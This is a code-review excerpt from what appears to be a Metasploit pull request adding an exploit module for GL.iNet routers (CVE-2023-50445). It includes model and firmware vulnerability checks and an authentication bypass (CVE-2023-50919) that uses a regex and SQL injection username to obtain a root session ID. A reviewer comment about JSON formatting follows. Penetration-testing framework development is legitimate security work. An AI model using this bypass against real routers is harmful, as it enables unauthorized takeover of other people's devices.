modules/exploits/linux/http/glinet_unauth_rce_cve_2023_50445.rb

```diff
@@ -0,0 +1,255 @@
+          @glinet['firmware'] = '3.x'
+        end
+      end
+    end
+
+    # check for the vulnerable models and firmware versions
+    case @glinet['model']
+    when 'ar750', 'ar750s', 'ar300m', 'ar300m16'
+      @glinet['arch'] = 'mipsbe'
+      return Rex::Version.new(@glinet['firmware']) == Rex::Version.new('4.3.7')
+    when 'mt300n-v2', 'mt1300'
+      @glinet['arch'] = 'mipsle'
+      return Rex::Version.new(@glinet['firmware']) == Rex::Version.new('4.3.7')
+    when 'ap1300', 'b1300'
+      @glinet['arch'] = 'armle'
+      return Rex::Version.new(@glinet['firmware']) == Rex::Version.new('4.3.7')
+    when 'e750', 'e750v2'
+      @glinet['arch'] = 'mipsbe'
+      return Rex::Version.new(@glinet['firmware']) == Rex::Version.new('4.3.8')
+    when 'mv1000'
+      @glinet['arch'] = 'armle'
+      return Rex::Version.new(@glinet['firmware']) == Rex::Version.new('4.3.8')
+    when 'ax1800', 'axt1800', 'mt2500', 'mt2500a', 'mt3000', 'a1300'
+      @glinet['arch'] = 'armle'
+      return Rex::Version.new(@glinet['firmware']) >= Rex::Version.new('4.0.0') && Rex::Version.new(@glinet['firmware']) < Rex::Version.new('4.5.0')
+    when 'mt6000'
+      @glinet['arch'] = 'armle'
+      return Rex::Version.new(@glinet['firmware']) >= Rex::Version.new('4.5.0') && Rex::Version.new(@glinet['firmware']) < Rex::Version.new('4.5.3')
+    end
+    @glinet['arch'] = 'n/a'
+    return false
+  end
+
+  def auth_bypass
+    # Check if datastore['SID'] is set
+    return datastore['SID'] unless datastore['SID'].blank?
+
+    # Exploit CVE-2023-50919 to retrieve the SID without valid username and password.
+    # Send an RPC request calling the challenge method, which will return a random nonce,
+    # the selected root user’s salt, and the crypt’s algorithm to hash the password.
+    post_data = "{\"jsonrpc\":\"2.0\",\"id\":#{rand(1000..9999)},\"method\":\"challenge\",\"params\":{\"username\":\"root\"}}"
+    res = send_request_cgi({
+      'method' => 'POST',
+      'ctype' => 'text/json',
+      'uri' => normalize_uri(target_uri.path, 'rpc'),
+      'data' => post_data.to_s
+    })
+    if res && res.code == 200 && res.body.include?('nonce')
+      res_json = res.get_json_document
+      unless res_json.blank?
+        nonce = res_json['result']['nonce']
+      end
+    else
+      fail_with(Failure::NotFound, 'Getting the random nonce failed.')
+    end
+    # Perform REGEX and SQL injection to get SID by falsified login and password
+    # Create the password hash which is the md5 of the concatenation of the user, password, and the retrieved nonce
+    username = "roo[^'union selecT char(114,111,111,116)--]:[^:]+:[^:]+"
+    pw = '0'
+    hash = Digest::MD5.hexdigest("#{username}:#{pw}:#{nonce}")
+
+    # Login with the password hash and obtain the SessionID (SID)
+    post_data = "{\"jsonrpc\":\"2.0\",\"id\":#{rand(1000..9999)},\"method\":\"login\",\"params\":{\"username\":\"#{username}\",\"hash\":\"#{hash}\"}}"
```

Comment:
Something like this would be more readable I think:

```suggestion
    post_data = {
      :jsonrpc => "2.0",
      :id => "#{rand(1000..9999)}",
      :method => "login",
      :params => {
        :username => "#{username}",
        :hash => "#{hash}"
      }
    }.to_json
```

Reply:
Agree. Will be updated.